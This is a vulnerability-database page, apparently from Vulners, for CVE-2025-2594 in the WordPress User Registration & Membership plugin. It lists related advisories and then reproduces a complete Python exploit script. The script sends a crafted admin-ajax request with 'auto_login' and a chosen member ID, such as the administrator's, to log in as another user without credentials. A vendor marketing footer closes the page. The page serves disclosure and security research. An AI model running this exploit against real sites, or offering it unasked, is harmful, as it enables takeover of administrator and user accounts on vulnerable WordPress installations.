| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2025-2594 | 2 Apr 202517:00 | โ | circl | |
| WordPress plugin User Registration & Membership ๅฎๅ จๆผๆด | 22 Apr 202500:00 | โ | cnnvd | |
| CVE-2025-2594 | 22 Apr 202506:00 | โ | cve | |
| CVE-2025-2594 User Registration & Membership < 4.1.3 - Authentication Bypass | 22 Apr 202506:00 | โ | cvelist | |
| WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass | 25 May 202500:00 | โ | exploitdb | |
| EUVD-2025-12286 | 3 Oct 202520:07 | โ | euvd | |
| CVE-2025-2594 | 22 Apr 202506:15 | โ | nvd | |
| ๐ WordPress User Registration and Membership 4.1.2 Authentication Bypass | 6 Feb 202600:00 | โ | packetstorm | |
| WordPress User Registration plugin < 4.1.3 - Authentication Bypass vulnerability | 1 Apr 202517:57 | โ | patchstack | |
| WordPress User Registration & Membership Pro plugin < 5.1.3 - Authentication Bypass vulnerability | 1 Apr 202518:05 | โ | patchstack |
#!/usr/bin/env python3
# Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
# Date: 2025-05-22
# Exploit Author: Mohammed Idrees Banyamer
# Vendor Homepage: https://wordpress.org/plugins/user-registration/
# Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
# Version: <= 4.1.2
# Tested on: WordPress 6.x, Apache on Linux
# CVE: CVE-2025-2594
import requests
import sys
import argparse
from urllib.parse import urljoin
from termcolor import cprint, colored
def banner():
cprint("โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ", "cyan")
cprint("โ WordPress Plugin User Registration <= 4.1.2 โ", "cyan")
cprint("โ Authentication Bypass Exploit (CVE-2025-2594)โ", "cyan")
cprint("โ Author: Mohammed Idrees Banyamer โ", "cyan")
cprint("โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ", "cyan")
def exploit(target_url, member_id, nonce):
endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
files = {
'action': (None, 'user_registration_membership_confirm_payment'),
'security': (None, nonce),
'form_response': (None, '{"auto_login": true}'),
'member_id': (None, str(member_id))
}
cprint(f"[+] Target URL: {endpoint}", "yellow")
cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")
try:
response = requests.post(endpoint, files=files, timeout=10)
if response.status_code == 200 and '"success":true' in response.text:
cprint("[โ] Exploit successful! Authentication bypass achieved.", "green")
cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
print("Server Response:")
print(response.text)
else:
cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
print("Server Response:")
print(response.text)
except requests.exceptions.RequestException as e:
cprint(f"[!] Request failed: {e}", "red")
def main():
banner()
parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")
args = parser.parse_args()
exploit(args.target, args.member_id, args.nonce)
if __name__ == "__main__":
main()Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation